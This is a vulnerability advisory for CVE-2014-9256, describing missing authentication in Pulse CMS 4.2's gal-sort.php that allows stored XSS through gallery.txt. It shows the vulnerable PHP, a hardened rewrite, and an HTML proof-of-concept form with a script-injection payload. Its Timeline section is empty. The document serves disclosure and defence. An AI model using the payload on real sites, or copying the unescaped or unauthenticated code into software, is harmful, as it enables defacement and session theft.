Pulse CMS 4.2 Missing Authentication

Homepage:

http://pulsecms.com/

CVE-ID

CVE-2014-9256

CVSS Score

5.0 (CVSS v2)

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description:

The admin login check (login.php) is not included by pulse\admin\inc\gal-sort.php, so the script can be requested by anyone without authenticating.

As a result an unauthenticated request controls what is written to ../../content/media/$gallery/gallery.txt, with $gallery taken straight from the POST body.

File: pulse\admin\inc\gal-sort.php

// No session/login check precedes this block.
if(!empty($_POST['gallery']) && !empty($_POST['one'])) {
	$gallery = $_POST['gallery'];    // attacker-controlled, used unvalidated in the path below
	$order   = $_POST['one'];        // attacker-controlled array (see the PoC: one[999])
	$taken   = array();
	$opFile  = "../../content/media/". $gallery ."/gallery.txt";

	// $new_data is assembled from $order in lines elided from this excerpt;
	// whatever the caller posts ends up in gallery.txt.
	$open = fopen($opFile,"w");
	if ($open) {
		$data = fwrite($open, $new_data);
		fclose($open);
	}
}

Because the gallery tag reads gallery.txt back and writes its fields into the page without escaping, a stored XSS payload can be placed there.

File: pulse\inc\tags\gal.php

$opFile = "content/media/". $galdir ."/gallery.txt";

if (file_exists($opFile)) {
	$fp   = fopen($opFile,"r");
	$data = @fread($fp, filesize($opFile));
	fclose($fp);
	$line = explode("\n", $data);          // one record per line

	foreach($line as $test){
		if(!empty($test)){
			$test_line[] = explode("|", $test);   // fields are pipe-separated
		}
	}

	foreach ($test_line as $t){
		$image = "content/media/$galdir/".$t[0];
		$info  = pathinfo($image);
		$ext   = $info['extension'];
		if ($ext != 'txt' || empty($ext)){
			$taken[] = $image;
			// $t[2] (and $image) are emitted raw inside single-quoted attributes:
			// a single quote in the stored field breaks out of the attribute.
			echo "<a title='$t[2]' href='$image'><img src='inc/plugins/timthumb.php?src=$path/$image&h=$thumbnail_height&w=$thumbnail_width'></a>";
		}
	}
}
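For reference, the following is an added example written for this page, not Pulse CMS code, showing how both code paths above could be hardened: gal-sort.php refuses unauthenticated requests and constrains the gallery name to an existing directory under the media root, and the gallery renderer escapes every field with ENT_QUOTES before it reaches HTML (the PoC payload relies on a bare single quote, which htmlspecialchars() does not encode unless ENT_QUOTES is passed). Assumptions, labelled in the code: the admin session is represented by $_SESSION['loggedin'] (in the real project the check is whatever login.php performs), and gallery.txt holds one "file|...|title" record per line, which is what $t[0] and $t[2] in gal.php suggest.

```php
<?php
// Added example, not Pulse CMS code. Hardened sketch of gal-sort.php (write
// side) and the gal tag (read side). Assumption: $_SESSION['loggedin'] marks
// an authenticated admin; the project's own check is performed by login.php.

// ---- write side (gal-sort.php): authenticate, then validate input ----
function save_gallery_order(array $session, array $post, $mediaRoot)
{
    if (empty($session['loggedin'])) {            // the check the original lacks
        http_response_code(403);
        return false;
    }
    if (empty($post['gallery']) || empty($post['one']) || !is_array($post['one'])) {
        return false;
    }
    $gallery = $post['gallery'];
    // Plain directory names only: no slashes, dots or NUL bytes reach the path.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $gallery)) {
        http_response_code(400);
        return false;
    }
    $root = realpath($mediaRoot);
    $dir  = ($root === false) ? false : realpath($root . '/' . $gallery);
    if ($dir === false || dirname($dir) !== $root) {
        http_response_code(404);                  // gallery must already exist
        return false;
    }
    // Assumption: one "file|...|title" record per line. Strip the record and
    // field separators so a posted value cannot add rows or columns.
    $records = array();
    foreach ($post['one'] as $entry) {
        $fields    = is_array($entry) ? $entry : array($entry);
        $records[] = implode('|', array_map(function ($f) {
            return str_replace(array("|", "\r", "\n", "\0"), '', (string) $f);
        }, $fields));
    }
    $written = file_put_contents($dir . '/gallery.txt',
                                 implode("\n", $records) . "\n", LOCK_EX);
    return $written !== false;
}

// ---- read side (gal tag): escape everything that is echoed ----
function h($s)
{
    // ENT_QUOTES matters: the attributes below are single-quoted.
    return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8');
}

function render_gallery($galdir, $path, $thumbnail_height, $thumbnail_width)
{
    $opFile = "content/media/" . $galdir . "/gallery.txt";
    if (!file_exists($opFile)) {
        return '';
    }
    $html = '';
    foreach (file($opFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        $t = explode("|", $line);
        if ($t[0] !== basename($t[0])) {          // drop anything with a path component
            continue;
        }
        $image = "content/media/$galdir/" . $t[0];
        if (strtolower(pathinfo($image, PATHINFO_EXTENSION)) === 'txt') {
            continue;
        }
        $title = isset($t[2]) ? $t[2] : '';
        $thumb = 'inc/plugins/timthumb.php?' . http_build_query(array(
            'src' => "$path/$image", 'h' => $thumbnail_height, 'w' => $thumbnail_width,
        ));
        $html .= "<a title='" . h($title) . "' href='" . h($image) . "'>"
               . "<img src='" . h($thumb) . "'></a>";
    }
    return $html;
}
```

With this in place the PoC payload is stored as a literal `'&gt;&lt;/a&gt;...` string inside the title attribute rather than terminating it, and the unauthenticated write is refused before the gallery name is ever used.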

Proof of Concept:

<form method="post" action="http://pulsecms-url/admin/inc/gal-sort.php">
    Gallery name: <input type="text" name="gallery">
    XSS: <input type="text" name="one[999]" value="'&gt;&lt;/a&gt;&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;">
    <input type="submit" value="Hack!">
</form>

The payload is stored in gallery.txt and executes on every page that renders that gallery: the leading single quote closes the title attribute, the rest closes the anchor and injects the script.

Timeline: